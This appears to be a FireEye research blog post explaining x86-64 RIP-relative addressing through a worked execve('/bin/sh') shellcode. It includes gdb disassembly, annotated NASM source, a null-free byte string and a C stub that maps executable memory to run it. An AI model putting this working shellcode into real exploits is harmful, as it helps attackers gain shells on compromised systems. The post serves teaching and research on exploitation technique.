FireEye Malware

Intelligence Lab

Threat research, analysis, and mitigation

Instruction Pointer Relative Addressing (for position independent code)

So, here's an interesting trick I've been using that I've never seen anyone mention before. One of the new features AMD added to the x86 instruction set when they designed AMD64/x86-64 is that in "long mode" (64-bit mode), the encoding for the old 32-bit immediate offset (displacement-only) addressing mode is now a signed 32-bit offset from the current RIP, not from 0x00000000 like before. In English, this means that you don't have to know the absolute address of something you want to reference; you only need to know how far away it is from the currently executing instruction [technically, from the start of the next instruction].
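
As a quick worked example of that arithmetic, here is a minimal sketch in C. The helper name `rip_relative_target` and the sample addresses are made up for illustration; the only thing taken from the text is the rule that the displacement is added to the address of the next instruction.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Effective address of a RIP-relative operand: the signed 32-bit displacement
 * is added to the address of the *next* instruction (insn_addr + insn_len). */
static uint64_t rip_relative_target(uint64_t insn_addr, size_t insn_len,
                                    int32_t disp32) {
    assert(insn_len >= 1 && insn_len <= 15);  /* x86 instructions are 1..15 bytes */
    /* Sign-extend the displacement to 64 bits before adding. */
    return insn_addr + insn_len + (uint64_t)(int64_t)disp32;
}
```

For a 7-byte instruction at the (hypothetical) address 0x400000, a displacement of 0 refers to 0x400007, and a displacement of -7 refers back to the instruction itself.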

So, let's say you're writing a fairly generic execve() shellcode. I'm going to assume that everyone here has read Aleph One's paper on this, so I'm not going to repeat that here. (Gripe: What is it with all these shellcode tutorials, that are just slightly rewritten copies of "Smashing the Stack…"?)

This is what we want to do:


execve() example in C

#include <stdio.h>
#include <unistd.h>   /* execve() */

int main() {
    char *name[2];

    asm("nop");

    name[0] = "/bin/sh";
    name[1] = NULL;
    execve(name[0], name, NULL);

    asm("nop");

    return 0;
}

I just put the NOPs in there to make things easier to spot below.

gdb spewage

gcc -static -g -o example example.c
gdb example
[spew]
*(gdb) disassemble main
Dump of assembler code for function main:
0x0000000000400284 <main+0>:    push   %rbp
0x0000000000400285 <main+1>:    mov    %rsp,%rbp
0x0000000000400288 <main+4>:    sub    $0x10,%rsp
0x000000000040028c <main+8>:    nop
0x000000000040028d <main+9>:    movq   $0x451ce4,0xfffffffffffffff0(%rbp)
0x0000000000400295 <main+17>:   movq   $0x0,0xfffffffffffffff8(%rbp)
0x000000000040029d <main+25>:   lea    0xfffffffffffffff0(%rbp),%rsi
0x00000000004002a1 <main+29>:   mov    0xfffffffffffffff0(%rbp),%rdi
0x00000000004002a5 <main+33>:   mov    $0x0,%edx
0x00000000004002aa <main+38>:   mov    $0x0,%eax
0x00000000004002af <main+43>:   callq  0x406740 <execve>
0x00000000004002b4 <main+48>:   nop
0x00000000004002b5 <main+49>:   mov    $0x0,%eax
0x00000000004002ba <main+54>:   leaveq
0x00000000004002bb <main+55>:   retq
End of assembler dump.
*(gdb) disassemble execve
Dump of assembler code for function execve:
0x0000000000406740 <execve+0>:  mov    $0x0,%eax
0x0000000000406745 <execve+5>:  mov    %rbx,0xffffffffffffffe8(%rsp)
0x000000000040674a <execve+10>: mov    %rbp,0xfffffffffffffff0(%rsp)
0x000000000040674f <execve+15>: mov    %r12,0xfffffffffffffff8(%rsp)
0x0000000000406754 <execve+20>: sub    $0x18,%rsp
0x0000000000406758 <execve+24>: test   %rax,%rax
0x000000000040675b <execve+27>: mov    %rdi,%r12
0x000000000040675e <execve+30>: mov    %rsi,%rbp
0x0000000000406761 <execve+33>: mov    %rdx,%rbx
0x0000000000406764 <execve+36>: je     0x40676b <execve+43>
0x0000000000406766 <execve+38>: callq  0x0
0x000000000040676b <execve+43>: mov    %rbx,%rdx
0x000000000040676e <execve+46>: mov    %rbp,%rsi
0x0000000000406771 <execve+49>: mov    %r12,%rdi
0x0000000000406774 <execve+52>: mov    $0x3b,%eax
0x0000000000406779 <execve+57>: syscall
You can ignore the rest of this...
0x000000000040677b <execve+59>: cmp    $0xfffffffffffff000,%rax
0x0000000000406781 <execve+65>: mov    %rax,%rbx
0x0000000000406784 <execve+68>: ja     0x40679b <execve+91>
0x0000000000406786 <execve+70>: mov    %ebx,%eax
0x0000000000406788 <execve+72>: mov    0x8(%rsp),%rbp
0x000000000040678d <execve+77>: mov    (%rsp),%rbx
0x0000000000406791 <execve+81>: mov    0x10(%rsp),%r12
0x0000000000406796 <execve+86>: add    $0x18,%rsp
0x000000000040679a <execve+90>: retq
0x000000000040679b <execve+91>: callq  0x400950 <__errno_location>
0x00000000004067a0 <execve+96>: mov    %ebx,%edx
0x00000000004067a2 <execve+98>: mov    $0xffffffffffffffff,%rbx
0x00000000004067a9 <execve+105>:        neg    %edx
0x00000000004067ab <execve+107>:        mov    %edx,(%rax)
0x00000000004067ad <execve+109>:        jmp    0x406786 <execve+70>
0x00000000004067af <execve+111>:        nop
End of assembler dump.
*(gdb) x/s 0x451ce4
0x451ce4 <_IO_stdin_used+4>:     "/bin/sh"

For lack of being able to easily draw arrows in flat HTML, I'm just coloring the important parts. As you can see, argument 1, the pointer to "/bin/sh", is in RDI; argument 2, the pointer to the pointer to "/bin/sh" followed by NULL, is in RSI; and argument 3, in RDX, is NULL. 0x3B (59 decimal) is the syscall number for execve, loaded into EAX just before the SYSCALL instruction.

We could have also just looked in /usr/linux/include/asm/unistd.h for the calling convention.

Excerpt from unistd.h

#define __NR_execve                             59
__SYSCALL(__NR_execve, stub_execve)
[...]
#define _syscall3(type,name,type1,arg1,type2,arg2,type3,arg3) \
type name(type1 arg1,type2 arg2,type3 arg3) \
{ \
long __res; \
__asm__ volatile (__syscall \
        : "=a" (__res) \
        : "0" (__NR_##name),"D" ((long)(arg1)),"S" ((long)(arg2)), \
                  "d" ((long)(arg3)) : __syscall_clobber); \
__syscall_return(type,__res); \
}
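
To make those register constraints concrete, here is a minimal sketch of the same convention written out by hand. It assumes GCC or Clang on x86-64 Linux; `raw_syscall3` and `raw_getpid` are hypothetical names, and it calls the harmless getpid rather than execve so it can be run without replacing the process.

```c
#include <assert.h>
#include <sys/syscall.h>   /* SYS_getpid */
#include <unistd.h>

/* Three-argument syscall, x86-64 Linux only: number in RAX, arguments in
 * RDI, RSI, RDX. The SYSCALL instruction itself clobbers RCX and R11. */
static long raw_syscall3(long nr, long arg1, long arg2, long arg3) {
    long ret;
    assert(nr >= 0);
    __asm__ volatile ("syscall"
                      : "=a"(ret)
                      : "0"(nr), "D"(arg1), "S"(arg2), "d"(arg3)
                      : "rcx", "r11", "memory");
    return ret;   /* on failure the kernel returns -errno here */
}

/* getpid takes no arguments, so the three argument registers are just zero. */
static long raw_getpid(void) {
    return raw_syscall3(SYS_getpid, 0, 0, 0);
}
```

Swapping in 59 for the number, with the three execve arguments in RDI, RSI, and RDX, is what the disassembly above does.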

So, all we have to do is have a "/bin/sh" string somewhere in memory, and a pointer to it somewhere else, followed by a NULL. Wherever our shellcode got written to is as good a place as any, but how do we know where we're executing from? On IA-32, there are only two really easy ways to get your current EIP: by making a CALL foo, which is like doing a PUSH EIP ; JMP foo, or by executing a floating point instruction and dumping the x87 environment out into memory with FSTENV, which includes the address of the last FPU instruction executed. (Historically, the FPU was a completely separate chip, and would do its own exception handling, and stuff.)

In Aleph One's original paper he did this trick:

     JMP foo
bar: POP ESI
     <rest of shellcode>
foo: CALL bar
.string "/bin/sh"

Which gives you, in ESI, the address of that "/bin/sh" at the end of your shellcode. Most of the Pex decoders in the Metasploit Framework use FSTENV to write the FPU environment out onto the stack, starting 12 bytes below the current ESP in fact, which leaves the fourth DWORD, the FPU instruction pointer (the EIP of the last floating point instruction), at the top of the stack, where it can then just be POP'ed off.

On x86-64, it is much easier to find your current RIP; just do this:

LEA RAX, [RIP]

And RAX will contain the address of the next instruction.
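
If you want to try that from C, here is a minimal sketch using GCC/Clang inline assembly (AT&T syntax, x86-64 only). `current_rip` is a hypothetical helper name, and a 64-bit destination register is used so the whole address is captured.

```c
#include <assert.h>
#include <stdint.h>

/* Returns the address of the instruction that follows the LEA below.
 * noinline keeps the LEA inside this function's own body. */
__attribute__((noinline)) static uintptr_t current_rip(void) {
    uintptr_t rip;
    /* lea 0(%rip), reg : displacement 0 from the next instruction */
    __asm__ volatile ("lea 0(%%rip), %0" : "=r"(rip));
    assert(rip != 0);
    return rip;
}
```

The value returned should land a few bytes past the start of `current_rip` itself, which is an easy sanity check in gdb.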

blah blah blah…

So, I was going to write a long narrative here about how to write shellcode, remove nulls, use shorter instruction encodings, and stuff. But I just got distracted and lost my train of thought, so if there's anything here you don't understand, just ask. By doing [RIP-7] rather than just [RIP], you avoid having a 0x00000000 immediate value: the displacement encodes as F9 FF FF FF instead, and because the LEA is 7 bytes long, the result is the address of the LEA itself. I'm writing the argv array just past the end of the "/bin/sh" string. Everything else should be self-explanatory.
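
To see why the displacement matters for null bytes, here is a minimal sketch that builds the LEA encoding by hand and scans it. Both function names are hypothetical; the byte values (REX.W 0x48, opcode 0x8D, ModRM 0x3D for RDI with a RIP-relative operand) are the standard x86-64 encoding.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Emit LEA RDI, [RIP+disp32]: REX.W, opcode 8D, ModRM 3D (mod=00, reg=RDI,
 * r/m=101 selects RIP-relative), then the displacement in little-endian. */
static void encode_lea_rdi_rip(int32_t disp32, uint8_t out[7]) {
    uint32_t d = (uint32_t)disp32;
    out[0] = 0x48;
    out[1] = 0x8D;
    out[2] = 0x3D;
    for (int i = 0; i < 4; i++)
        out[3 + i] = (uint8_t)(d >> (8 * i));
}

/* Returns 1 if any byte in buf is 0x00, which would cut a C string short. */
static int contains_null_byte(const uint8_t *buf, size_t len) {
    assert(buf != NULL);
    for (size_t i = 0; i < len; i++)
        if (buf[i] == 0)
            return 1;
    return 0;
}
```

With a displacement of 0 the last four bytes are all zero; with -7 they become F9 FF FF FF and the instruction is null-free.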


Shellcode

%define arg1      RDI
%define arg2      RSI
%define arg3      RDX
%define arg3_lowb DL
%define sys_nr    AL
%define nr_execve 0x3B

BITS 64
   LEA        arg1, [RIP-here]            ; runtime address of *this* LEA instruction,
                                          ; removes 00000000's (always encode with 32-bit
                                          ; immediate)

                                          ; todo: could just push string onto stack (as 
                                          ; immediate value)
here:
   ADD        arg1, BYTE bin_sh           ; offset of "/bin/sh" in code below

   XOR                    arg3, arg3      ; execve(..., ..., NULL);
   MOV       [arg1+null_byte ], arg3_lowb ; write a '\0' to end of string, just in case
   MOV       [arg1+null_point], arg3      ; name[1] = NULL;
   MOV       [arg1+name_array], arg1      ; name[0] = address to "/bin/sh" in
                                          ;           execve("/bin/sh", ..., ...);
   LEA arg2, [arg1+name_array]            ; execve(..., name, ...);
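   MOV sys_nr, nr_execve                  ; Syscall 59 execve(); only AL is written, so
                                          ; this assumes the rest of RAX is already zero
   SYSCALL                                ; not INT 0x80: that gate uses the 32-bit
                                          ; syscall numbers and registers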
bin_sh:
     db "/bin/sh";
     null_byte  equ $-bin_sh
     name_array equ null_byte +1
     null_point equ name_array+8

The shellcode binary ends up looking like this:

Shellcode Bytes

488D3DF9FFFFFF          LEA RDI, [RIP-here]
4883C721                ADD RDI, BYTE bin_sh
4831D2                  XOR RDX, RDX
885707                  MOV [RDI+null_byte ], DL
48895710                MOV [RDI+null_point], RDX
48897F08                MOV [RDI+name_array], RDI
488D7708                LEA RSI, [RDI+name_array]
B03B                    MOV AL, 0x3B
0F05                    SYSCALL
2F62696E2F7368          db "/bin/sh"
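
The offsets in that listing can be double-checked with a little arithmetic. This is a minimal sketch; the constants are read off the listing above, and `shellcode_footprint` is a hypothetical helper that adds up how much memory the code touches once it has written its argv array.

```c
#include <assert.h>
#include <stddef.h>
#include <string.h>

enum {
    BIN_SH_OFFSET = 0x21,            /* immediate in ADD RDI, BYTE bin_sh (33 bytes of code) */
    NULL_BYTE     = 7,               /* offset of the '\0' after "/bin/sh" */
    NAME_ARRAY    = NULL_BYTE + 1,   /* name[0], right after the terminator */
    NULL_POINT    = NAME_ARRAY + 8   /* name[1], one 8-byte pointer later */
};

/* Bytes touched, counted from the first instruction: the code, the string,
 * its terminator, and the two 8-byte argv slots written at run time. */
static size_t shellcode_footprint(void) {
    assert(strlen("/bin/sh") == NULL_BYTE);
    return (size_t)BIN_SH_OFFSET + NULL_POINT + 8;
}
```

That comes to 57 bytes, so the 40-byte payload needs 17 more writable bytes directly after it.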

To quickly test this out, I'm just mmapping a page of anonymous memory, writing the shellcode into there, and then running it. I have to do it this way because Gentoo Linux x86_64 sets memory pages to be either writable [X]OR executable, but not both at once, and non-exec actually works on AMD64. This is a lot faster than writing a real exploit (which would involve building my own stack frames to make return-to-libc calls, to call mprotect and stuff, blah blah).

memory map

$ cat /proc/16874/maps

00400000-00471000 r-xp 00000000 fd:05 4853              /home/jwolf/duh
00571000-00573000 rw-p 00071000 fd:05 4853              /home/jwolf/duh
00573000-00596000 rw-p 00573000 00:00 0                 [heap]
2b429e3da000-2b429e3db000 rwxs 00000000 00:07 326570    /dev/zero (deleted)
(the line above is the mmap'd page)
7fffff7f6000-7fffff80c000 rw-p 7fffff7f6000 00:00 0     [stack]
ffffffffff600000-ffffffffffe00000 ---p 00000000 00:00 0 [vdso]

Cut and paste the spew from this into shellcode[], below:

yasm -l shellcode.log -L nasm shellcode.yasm && hexdump -v -e '1/1 "Qx%02x"' shellcode \
|tr "Q" \\\\ ; echo ; ls -l shellcode

Small code stub in C

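#include <stdio.h>      // perror()
#include <string.h>     // memcpy()
#include <sys/mman.h>   // mmap()

// TODO: just mmap the binary file the assembler spit out.
char shellcode[] = "\x48\x8d\x3d\xf9\xff\xff\xff\x48\x83\xc7\x21\x48\x31\xd2\x88\x57\x07\x48\x89\x57\x10\x48\x89\x7f\x08\x48\x8d\x77\x08\xb0\x3b\x0f\x05\x2f\x62\x69\x6e\x2f\x73\x68";
int length = 40;

int main() {

  // One anonymous page that is readable, writable, and executable.
  void *page = mmap (0, 4096, PROT_READ|PROT_WRITE|PROT_EXEC,
                              MAP_SHARED|MAP_ANONYMOUS, -1, 0);
  if (page == MAP_FAILED) {
    perror("mmap");
    return 1;
  }
  memcpy(page, shellcode, length);
  void (*exec_mem)() = page;

  asm("break: nop");   // label for gdb's "break break"

  exec_mem();

  return 0;
}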

Build with something like:

gcc -g -o stub stub.c

then ./stub
sh-3.00$

or if you were root at the time:
sh-3.00#

ta-da.

Debugging notes

If you need to debug this because you got a segfault, then that's a long long topic that I don't feel like writing about right now. I usually start off with:

gdb stub |tee -a gdb_spew.log

and then…

           break break
           display/i $rip
           r
           stepi

and then do "info reg" and "x/8xg" stuff as needed.

Postscript:

Has anyone else noticed that, when running in 32-bit compatibility mode on AMD64 Linux:

  1. gdb is just plain broken (wrong values in registers, etc.)
  2. The register used for the second argument of a syscall changes, seemingly at random, between EBX and EBP when you're using INT 0x80 vs. SYSCALL (CD80 vs. 0F05).



Julia Wolf @ FireEye Malware Intelligence Lab
Questions/Comments to research [@] fireeye [.] com
